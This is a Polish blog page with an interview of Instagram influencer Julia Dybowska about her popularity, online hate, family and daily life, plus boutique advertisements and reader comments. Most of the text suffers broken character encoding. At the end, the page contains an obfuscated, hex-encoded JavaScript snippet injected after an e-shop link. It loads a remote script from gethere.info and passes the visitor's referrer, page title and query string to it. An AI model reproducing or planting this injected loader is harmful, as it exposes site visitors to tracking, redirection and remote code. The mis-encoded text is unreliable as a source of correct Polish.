CaA�a prawda o Julii Dybowskiej

opublikowane w Najnowsze Wpisy, Psychologia, Światopogląd | 81

 

julia-wyrA?A?niajA�ce-848x400

CaA�a prawda

Karolina Rabiega:A�Masz ponad 50 tys. obserwujA�cych na Instagramie. Ludzie podchodzA� do Ciebie na ulicy, pytajA� czy mogA� zrobiA� sobie z TobA� zdjA�cie. Kobiety chcA� siA� ubieraA� tak samo jak Ty, uA?ywaA� tych samych kosmetykA?w. Na czym polega fenomen Julii Dybowskiej?

Julia Dybowska: CaA�a prawda! Nie ukrywam, A?e nie raz zadawaA�am sobie to pytanie. Trudno powiedzieA�a�� MyA�lA�, A?e od najmA�odszych lat zostaA�am a�znaznaczonaa�?a�� Cechuje mnie duA?a indywidualnoA�A�. Zawsze A?yA�am w zgodzie ze sobA�, robiA� to, co czujA�, choA� czasami moA?e nie jest to zrozumiaA�e dla otoczenia. GA�oA�no wyraA?am swoje opinie, nie lubiA� hipokryzji, co nie zawsze jest dobrze przyjmowane. Mimo to nie zamierzam siA� zmieniaA�. MoA?e to wA�aA�nie wzbudza tyle emocji. JuA? na poczA�tku edukacji w szkole baletowej ksztaA�towaA� siA� mA?j charakter lidera.

KR: ByA�aA� nielubiana?

JD: Przez czA�A�A� dziewczA�t myA�lA�, A?e taka��

stolica-helen

Czy byA�aA� juA? w naszym Nowym Butiku ?
Warto
!

ZajdA? koniecznie!!!

Porthos Helen Moda Boutique

ul. Grochowska 265
Warszawa

KR: Jaki doA�wiadczenie nauczyA�o ciA� najwiA�cej w A?yciu?

JD: MyA�lA�, A?e nie miaA�am takiego jednego konkretnego doA�wiadczenia, nie przeA?yA�am A?adnej traumy A?yciowej ani przeciwnie a�� jakiegoA� wielkiego pozytywnego uniesienia. Ale uwaA?am, A?e najwiA�cej zawdziA�czam rodzicom, temu jak mnie wychowali, ile ze mnA� rozmawiali, i szkole baletowej, ktA?ra byA�a ogromnA� czA�A�ciA� mojego A?ycia. Bardzo dobrze wspominam ten czas, to byA�a szkoA�a A?ycia, dziA�ki niej jestem tym kim jestem. NauczyA�am siA� wytrwaA�oA�ci, dA�A?enia do celu, tam wyksztaA�ciA�a mojA� silnA� osobowoA�A�, ktA?rA� prA?bowali nie raz nam zA�amaA� w szkole. No ale silnych nie da siA� zA�amaA�.

KR: Co uwaA?asz za swA?j najwiA�kszy sukces?

JD: To, A?e nie robiA�c zupeA�nie nic od zawsze wzbudzam tyle emocji. Mam mnA?stwo celA?w, ktA?re chciaA�abym zrealizowaA�, jestem typem czA�owieka, ktA?ry pracuje nad sobA� i stawia sobie wysoko poprzeczkA�. Nigdy siA� nie poddajA�. Sukcesem mogA� nazwaA� to, A?e nie robiA�c nic w tym kierunku wzbudzam tyle emocji.

KR: A jaka jest twoja najwiA�ksza poraA?ka?

JD: Chyba jestem jeszcze za mA�oda. MyA�lA�, A?e nie poniosA�am w A?yciu jeszcze A?adnej poraA?ki. Ja zawsze robiA� wszystko zgodnie z wA�asnym sumieniem. I nie mogA� powiedzieA�, A?e coA� w moim A?yciu byA�o poraA?kA�. Bo jeA?eli coA� w moim A?yciu jest spisane na stratA� to siA� z tego od raz wycofujA�.

KR: JesteA� rozpoznawalna?

JD:A� Codziennie dowiadujA�, siA�, A?e ktoA� mnie zna, ktoA� mnie gdzieA� widziaA�. CzA�sto podchodzA� do mnie bardzo mili ludzie, A?yczA� mi powodzenia, mA?wiA� ciepA�e sA�owa i A�pytajA�, czy mogA� zrobiA� sobie ze mnA� zdjA�cie.

KR: JesteA� znana z Instagrama?

JD: Powiem szczerze, A?e nie wiem kiedy to siA� tak naprawdA� zaczA�A�o. Tak jak mA?wiA�am wczeA�niej a�� zawsze wzbudzaA�am duA?o emocji. MyA�lA�, A?e Instagram takA?e je zwiA�kszyA�.

KR: Czy uwaA?asz, A?e ludzie nie lubiA� osA?b, ktA?re odniosA�y sukces?

JD: A�UwaA?am, A?e nie moA?na w tej kwestii generalizowaA�. Ludzie, ktA?rzy nie majA� kompleksA?w i sami odnieA�li w A?yciu mniejszy bA�dA? wiA�kszy sukces i sA� zadowoleni ze swojego A?ycia, potrafiA� siA� cieszyA� cudzym szczA�A�ciem. Natomiast czytajA�c komentarze na portalach spoA�ecznoA�ciowych moA?na zauwaA?yA�, A?e jednak wiele osA?b nie jest szczA�A�liwych i zadowolonych z tego, jak A?yje.

KR: SkA�d siA� bierze zawiA�A�?

JD: Z wA�asnego niepowodzenia, z myA�lenia, A?e jeA�li nam jest A?le, to dlaczego komuA� innemu ma byA� lepiej.

KR: PojawiA� siA� o artykuA� na TwA?j temat na portalu papilot.pl, posypaA�a siA� fala hejtA?wa�� RobiA�am coraz wiA�ksze oczy, czytajA�c to. Nie mam pojA�cia jak moA?na mieA� aA? tyle jadu w sobie. MyA�lA� sobie, A?e niewaA?ne jak bardzo bym kogoA� nienawidziA�a, nigdy nie napisaA�abym czegoA� takiegoa��

JD: Ja mam tak samo, nigdy w A?yciu nie daA�am nikomu negatywnego komentarza, nawet jak coA� mi siA� nie podoba to przechodzA� obok tego. Ale ja wiem dokA�adnie kto to robi, i te wszystkie negatywneA� komentarze piszA� 4 osobya��

KR: Jaki byA� najgorszy komentarz jaki przeczytaA�aA� na swA?j temat?

JD: Jak juA? ubliA?ali mojej rodzinie, mojej mamie, moim dziadkoma�� To co siA� tyczy mnie to niech sobie piszA�, bo mnie to nie obchodzi, ale moja mama jest najwspanialszym czA�owiekiem, najbardziej uduchowionym, wierzA�cym, religijnyma�� wiA�c to, co pisali na jej temat to byA�o bardzo, bardzo przykre.

KR: Ludzie sA� ciekawi Twojego A?ycia, pytajA� gdzie siA� ubierasz, gdzie chodzisz do kosmetyczki. Mam wraA?enie, A?e chcA� znaA� kaA?dy szczegA?A�. Jak reagujesz na pytania typu: a�zjaki to numer lakieru, jaki to odcieA� rA?A?ua�? itp. ?

JD: Bardzo czA�sto odpowiadam, chyba, A?e to pytanie pojawia siA� setny raz.

KR: A moA?e zaspokoimy ciekawoA�A� ludzi i opowiesz o tym jak wyglA�da TwA?j dzieA�?

JD: SwA?j dzieA� rozpoczynam od kawy z mlekiem i ciepA�ej wody z cytrynA� i miodem. To taki mA?j codzienny rytuaA�. JeA�li coA� go zaburzy to jestem niezadowolona. PA?A?niej zazwyczaj umawiam siA� z koleA?ankA� na A�niadanie. PoniewaA? reklamujA� rA?A?ne produkty na Instagramie, codziennie odbieram paczki na poczcie, czasem kilka razy dziennie przychodzi kurier, potem robiA� sobie zdjA�cia przed lustrema�� Gdy ludzie pytajA� mnie co robiA�, mA?wiA�, A?e jestem bardzo zapracowana (A�miech). Jest to przyjemna praca, zawsze marzyA�am, A?eby robiA� w A?yciu coA�, co sprawia mi przyjemnoA�A�. Bardzo wspA?A�czujA� ludziom, ktA?rzy muszA� codziennie rano wstawaA� i sA� niezadowoleni. PamiA�tam jak chodziA�am do szkoA�y baletowej, codziennie wstajA�c rano byA�am zaA�amana faktem, A?e czeka mnie 5 godzin potu na salia�� JuA? nie wspomnA� o tym, A?e pomiA�dzy tym potem, A�zami i krwiA� byA� sprawdzian z geografii, biologii czy polskiegoa��

KR: Masz dystans do siebie?

JD: Mam, szkoA�a baletowa mnie tego nauczyA�a.

KR: Kasujesz negatywne komentarze na swA?j temat?

JD: KiedyA� kasowaA�am. Przez ostatnie pA?A� roku juA? nie, chociaA? ostatnio nastA�piA�a ogromna fala hejtA?w i niektA?re z nich skasowaA�am, zwA�aszcza tych dotyczA�cych mojej rodziny albo takich, ktA?re sA� totalnA� bzdurA� np., A?e jestem escort, co jest totalnie A?enujA�cea�� To kasujA�. Ale i tak na moim profilu widnieje mnA?stwo negatywnych komentarzy.

KR: A piszesz sobie sama pozytywne komentarze na swA?j temat?

JD: Nie, nigdy w A?yciu nie napisaA�am sobie A?adnego komentarza i nigdy bym nie napisaA�a.

KR: Czym siA� zajmujesz w Warszawie? Robisz sesje komercyjne, prawda?

JD: Czasami tak, ale ostatnio pewna pani zapytaA�a mnie, czy jestem modelkA�, to odpowiedziaA�am, A?e nie. RobiA� czasami komercyjne sesje, ale nie nazywam siebie modelkA� ani fotomodelkA�. Gdybym to robiA�a czA�sto i regularnie, to mogA�abym siebie nazywaA� modelkA�.

KR: A gdybyA� miaA�a byA� z czegoA� znana, to z czego?

JD: Z jakiegoA� dobrego uczynkua�� Z zasA�ug np. pomocy potrzebujA�cym. Na pewno z czegoA� dobrego, a nie dla poklasku.

KR: Co sprawia, A?e jesteA� szczA�A�liwa?

JD: Na pewno moja rodzina, najukochaA�si dziadkowie, kochany tata i A�wspaniaA�y kontakt z mamA�. Rodzina jest dla mnie najwaA?niejsza w A?yciu, a moja mama jest mojA� najlepszA� przyjaciA?A�kA�, jedynA�, ktA?ra nigdy mnie nie zawiodA�a, nie zdradziA�a. Mamy A�wietny kontakt, jesteA�my jak koleA?anki, chociaA? oczywiA�cie mam ten szacunek jako do matki. Nie mamy A?adnych tematA?w tabu, rozmawiamy o wszystkim, razem wyjeA?dA?amy na wakacje.

KR: A czy uwaA?asz, A?e szczA�A�cie zaleA?y tylko i wyA�A�cznie od nas? JesteA�my kowalami wA�asnego losu?

JD: UwaA?am, A?e w 98% taka��ale jednak te 2% to jest siA�a wyA?sza. MoA?e wA�aA�nie dlatego jestem szczA�A�liwa, A?e wszystko robiA� tak A?eby to szczA�A�cie byA�o.

CaA�a prawda

KR: Czego siA� boisz?

JD: BojA� siA� staroA�ci i samotnoA�ci, to mnie przeraA?a. StaroA�A� kojarzy mi siA� z samotnoA�ciA�, nie wiem dlaczego, przecieA? moi dziadkowie nie sA� samotni.

KR: UwaA?asz, A?e to wszystko, co osiA�gnA�A�aA� to tylko dziA�ki sobie, czy po prostu miaA�aA� szczA�A�cie?

JD: Nie, absolutnie. MiaA�am szczA�A�cie. MiaA�am szczA�A�cie, A?e urodziA�am siA� w rodzinie z takimi wartoA�ciami, A?e jestem jedynaczkA� i tak bardzo mocno doA�wiadczyA�am miA�oA�ci w domu, wyrastaA�am w takim rodzinnym cieple.

KR: A�aA�ujesz czegoA�?

JD: WychodzA� z zaA�oA?enia, A?e w A?yciu nie naleA?y A?aA�owaA� niczego co siA� zrobiA�o. Jednak odrobinA� A?aA�uje, ze w przeszA�oA�ci zaufaA�am i pozwoliA�am siA� zbliA?yA� nieodpowiednim, interesownym koleA?ankom. To jedyna rzecz.

KR: Jakie sA� Twoje wady? CaA�a prawda.

JD: Jestem bardzo wymagajA�ca zarA?wno wobec siebie jak i osA?b mnie otaczajA�cych.

KR: A zalety?

JD: Jestem osobA� bardzo wraA?liwA� np. na krzywdA� ludzkA�. UwaA?am, A?e w dzisiejszych czasach znieczulicy jest to duA?a zaleta. MyA�lA�, A?e mam dobre serce, A?yczA� wszystkim ludziom jak najlepiej. Kiedy jestem z kimA� w bliskiej relacji, nawet koleA?eA�skiej, to bardzo angaA?ujA� siA� w A?ycie tej osoby. Wiele osA?b zgA�asza siA� do mnie z proA�bA� o A?yciowe porady i zawsze staram siA� im pomA?c.

KR: Jaka jesteA� w zwiA�zku? CaA�a prawda.

JD: W zwiA�zku jestem bardzo oddana, dajA� z siebie 150 % i tego samego oczekujA� od drugiej osoby. Tak jak wspomniaA�am wczeA�niej a�� jestem bardzo wymagajA�ca. Wszystkie swoje zwiA�zki zaliczam do udanych, czuA�am siA� w nich bardzo kochana. KaA?da relacja bardzo duA?o mnie nauczyA�a, wiele wyniosA�am i nigdy nie popeA�niam tych samych bA�A�dA?w. Jestem bardzo wdziA�czna, A?e kaA?dy z tych mA�A?czyzn, ktA?ry pojawiA� siA� w moim A?yciu czegoA� mnie nauczyA�.

CaA�a prawda, Czy to prawda, Czy CaA�a prawda?A�– prosimy o komentarze.

julia 2 julia 4
julia 5 julia 6
12092506_10153227202306295_434601993_n julia 3

Z Facebooka wziA�te:

Marianna PolankoA�Marianna Polanko Ludzie z natury majA� zawiA�A�, nawet jak nie chodzi o sukcesy……… to jest nie chA�A� do czA�owieka. Najlepiej tym siA� nie przejmowaA�….. A?yA� sobA� i do przodu. Pozdrawiam
A�.

 

Ryszard WrzesiA�skiRyszard WrzesiA�skiDziA�ki, chyba siA� z PaniA� zgadzam. Pozdrowienia

Czy byA�aA� juA? w naszym Porthos Helen Moda Boutique w Warszawie przy ul Grochowskiej 265?

logohelenmoda

Zapraszamy teA? do www.esklep.porthos.plA�

esklep02var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}